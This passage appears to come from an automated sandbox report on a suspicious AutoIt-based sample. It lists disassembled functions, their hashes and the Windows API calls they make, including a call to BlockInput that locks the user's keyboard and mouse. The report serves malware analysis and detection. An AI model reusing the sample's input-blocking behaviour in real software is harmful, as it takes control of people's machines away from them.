                                                      • Instruction Fuzzy Hash: 46B18D32A10608CFD714CF28C486B647BE0FF05366F658658EDA9CF2A2C735D989DB40
                                                      Function 00F3B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: f691e001273456588f5e4e13bb556d8f43749808b68cfea37d9e158be7a83fe1
                                                      • Instruction ID: c4543240a4b9d1b54f4ad59e86494994da8b6a099d79a8b16149e7025da8970a
                                                      • Opcode Fuzzy Hash: f691e001273456588f5e4e13bb556d8f43749808b68cfea37d9e158be7a83fe1
                                                      • Instruction Fuzzy Hash: 56125F71D002299BCB14CF58C891BEEB7B5FF48720F14819AE949EB251DB349E81EF91
                                                      Function 00F9EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 00F9EABD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      • Opcode ID: 204a72abde76e9842cbc0dc7ffa9c4d7e3893c627e2529c2f1d38bd79529dbe1
                                                      • Instruction ID: 71e439db0a4e22c7094d468bf6216f69cbc5cc3c3a17e20f5bfa4398449296ac
                                                      • Opcode Fuzzy Hash: 204a72abde76e9842cbc0dc7ffa9c4d7e3893c627e2529c2f1d38bd79529dbe1
                                                      • Instruction Fuzzy Hash: 98E04F322002149FD710EF59E845E9AF7E9AF98770F048426FC49CB361DB74E8419BE0
                                                      Function 00F409D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00F403EE), ref: 00F409DA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: cb9ded820e7c78230cda12785ebc037364dd1f8fe8162f29781b625af53bb6e6
                                                      • Instruction ID: 879bd8735370d08353c0c083e132511fe6911f61b14fd5461b6e9a760263e447
                                                      • Opcode Fuzzy Hash: cb9ded820e7c78230cda12785ebc037364dd1f8fe8162f29781b625af53bb6e6
                                                      • Instruction Fuzzy Hash:
                                                      Function 00F4781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                      • Instruction ID: 56db24b41f250f2114f61132472cb0599075160ee13a061b2d860da0baea0fe0
                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                      • Instruction Fuzzy Hash: 24515772E0C7455ADB38B56888597BF7F899B12360F280909DC82D7382C719DE46F352
                                                      Function 00F56DD9 Relevance: .6, Instructions: 637COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cbfe989db4a6f85da8612d13c477af4b3a9a47964c8f12acc290d0ee249d9324
                                                      • Instruction ID: de9912d45bb40691264cbba86e9c7cd1fa4d91da811d282d4be19fb68c74d05a
                                                      • Opcode Fuzzy Hash: cbfe989db4a6f85da8612d13c477af4b3a9a47964c8f12acc290d0ee249d9324
                                                      • Instruction Fuzzy Hash: 45323322D29F054DD723A634DD22335A649AFB73D6F14C737EC1AB69A5EF29C4836100
                                                      Function 00F3CC39 Relevance: .6, Instructions: 635COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ca86ed1bfe3fa9655196ad750472ac9f981fb570bfc4b5f22120872775d9b476
                                                      • Instruction ID: e3feb5376fa62094852c81748c4eaecbbf6377b768cf0056b010e9de8d8f8531
                                                      • Opcode Fuzzy Hash: ca86ed1bfe3fa9655196ad750472ac9f981fb570bfc4b5f22120872775d9b476
                                                      • Instruction Fuzzy Hash: 9632F232E001858BDF28CE29C49467D77A1EB45360F28C56FD95EAB291D634DD82FBC2
                                                      Function 00F27920 Relevance: .6, Instructions: 563COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d0299296298134b621a4bb08d14b5212d1accbf60f6a4888b6889ff3289bc91b
                                                      • Instruction ID: 4b1a4dea35d01b363861eb0e984436a6931a675e2b25495fa643787a86c490cc
                                                      • Opcode Fuzzy Hash: d0299296298134b621a4bb08d14b5212d1accbf60f6a4888b6889ff3289bc91b
                                                      • Instruction Fuzzy Hash: 9722E271E0461ADFDF14DF64D881AAEB3F2FF44710F144129E812AB291EB3AAD54EB50
                                                      Function 00F291C0 Relevance: .5, Instructions: 475COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1bb82dc8721b6b2ad5823e67156a34a1c6754a25f8f6aa625289fbfd8f1f5c71
                                                      • Instruction ID: 2071fe32dcdde3b557c84b837d990b8cc8157ee0225ca944931d6bcdac3b136d
                                                      • Opcode Fuzzy Hash: 1bb82dc8721b6b2ad5823e67156a34a1c6754a25f8f6aa625289fbfd8f1f5c71
                                                      • Instruction Fuzzy Hash: 4902C7B1E0021AEFDB04DF54D881AAEB7B5FF44310F108169E806DB391EB75AE54EB91
                                                      Function 00F41C77 Relevance: .3, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction ID: 2d9680b223459ac604faf94a8d9736532ec821ebac73c821b0dda92fd2cd7ee6
                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction Fuzzy Hash: B8915877A080E349DB294639857417EFFF16A523B131A079DDCF2CA1C5FE249994F620
                                                      Function 00F419B0 Relevance: .2, Instructions: 240COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction ID: 360aa51ac7a97661955858e5bad64c31ee387356c666b442805f645c80943dc6
                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction Fuzzy Hash: EF9135736090E349DB6D467A857417EFFE1AA923B131A079DD8F2CA1C1FD2485E4F620
                                                      Function 00F47A4A Relevance: .2, Instructions: 237COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96da4a6adf67f66489c7edba7000c06ab9b7b557941570e0f2eca41b1fb3b8a7
                                                      • Instruction ID: 2fa199981992db7d549c3b63a1cc26a45e46ea719a1bc9358a1e6fad325ad845
                                                      • Opcode Fuzzy Hash: 96da4a6adf67f66489c7edba7000c06ab9b7b557941570e0f2eca41b1fb3b8a7
                                                      • Instruction Fuzzy Hash: B661B972A0870956DA34BA288C91BBE3F84DFC1360F10091AED83DB295DB199E43F355
                                                      Function 00F47CA7 Relevance: .2, Instructions: 237COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 84122555b43642c27f7b12af34e723b2a531a98225887a178e267a51d3a61bc8
                                                      • Instruction ID: 8a0343aa1734bec8a51e552072b95f3f78da1375336eee776c3aa6ee48e11cb5
                                                      • Opcode Fuzzy Hash: 84122555b43642c27f7b12af34e723b2a531a98225887a178e267a51d3a61bc8
                                                      • Instruction Fuzzy Hash: 4161AB32E1C74966DE38BA284C51BBF3FA4DF42764F100A59ED43DB281EB16AD42B251
                                                      Function 00F41706 Relevance: .2, Instructions: 232COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction ID: ef2cd7d90e32712cf463c24176512d10767ba0505259fb851a9ecbe59ec9995f
                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction Fuzzy Hash: 0F814473A090E349EB6D467A857443EFFE17A923B131A079DD8F2CA1C1EE249594F620
                                                      Function 011635F0 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction ID: 6d9579a4d716a5fcc9f3210d5864d0fcec064e3f7b5ba5c384fb414ac07a5887
                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction Fuzzy Hash: C741C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB40
                                                      Function 00F92046 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8de84356970a558a44a5441ea0f0b0de5b3b3225b581690b3681e51a3026f580
                                                      • Instruction ID: 6b4bb00a4c89342f58ded0bb99c412c1cd0a55e48cdf4ac6d9837560d657cdb2
                                                      • Opcode Fuzzy Hash: 8de84356970a558a44a5441ea0f0b0de5b3b3225b581690b3681e51a3026f580
                                                      • Instruction Fuzzy Hash: 4A21BB327205158BDB68CF79C81367E73E9AB54320F15862EE4A7D37D1DE39A904DB80
                                                      Function 01163480 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                      • Instruction ID: 76fee7504f89b9f502ee633fd069aa5b36637d48ff75e568d455afc85c084015
                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                      • Instruction Fuzzy Hash: 42019278A14109EFCB49DF98C5909AEF7F9FF48310F208599D819A7705D731AE51DB80
                                                      Function 011634E0 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                      • Instruction ID: 5c5f0b0291248a1c383bb29fa3ff542db6d5ec129645bfc06f0a5287c01bcd66
                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                      • Instruction Fuzzy Hash: 1401A478A14209EFCB48DF98C5909AEF7F9FF48310F208599E819A7701E731AE51DB80
                                                      Function 01161E70 Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                      Function 00FA2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00FA2B30
                                                      • DeleteObject.GDI32(00000000), ref: 00FA2B43
                                                      • DestroyWindow.USER32 ref: 00FA2B52
                                                      • GetDesktopWindow.USER32 ref: 00FA2B6D
                                                      • GetWindowRect.USER32(00000000), ref: 00FA2B74
                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00FA2CA3
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00FA2CB1
                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2CF8
                                                      • GetClientRect.USER32(00000000,?), ref: 00FA2D04
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00FA2D40
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2D62
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2D75
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2D80
                                                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2D89
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2D98
                                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2DA1
                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2DA8
                                                      • GlobalFree.KERNEL32(00000000), ref: 00FA2DB3
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2DC5
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FBFC38,00000000), ref: 00FA2DDB
                                                      • GlobalFree.KERNEL32(00000000), ref: 00FA2DEB
                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00FA2E11
                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00FA2E30
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2E52
                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA303F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-2373415609
                                                      • Opcode ID: 947254e9847aeaa9e72baa4a057efb9803acbfb2a18f469f5c942ba8218e60e8
                                                      • Instruction ID: 3967800effb624a8a6de343041a17dca3cc1a753eb94951a476dc142e9b3aafb
                                                      • Opcode Fuzzy Hash: 947254e9847aeaa9e72baa4a057efb9803acbfb2a18f469f5c942ba8218e60e8
                                                      • Instruction Fuzzy Hash: A0024E71A00219AFDB14DF68CC89EAE7BB9FF49720F048158F915AB2A1C7749D01EF60
                                                      Function 00FB70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 00FB712F
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FB7160
                                                      • GetSysColor.USER32(0000000F), ref: 00FB716C
